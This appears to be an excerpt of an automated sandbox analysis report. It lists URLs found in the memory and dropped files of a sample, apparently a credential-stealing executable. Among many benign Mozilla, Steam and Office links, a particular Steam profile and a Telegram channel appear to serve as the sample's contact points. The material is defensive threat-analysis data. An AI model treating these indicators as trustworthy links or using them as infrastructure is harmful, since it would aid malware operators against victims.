                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://mozilla.org0/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: UMrFwHyjUi.exeString found in binary or memory: https://sectigo.com/CPS0
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
                          Source: UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampo
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: FHJEGI.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: FHJEGI.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjoke
                          Source: UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/BAKFIEGHCB
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
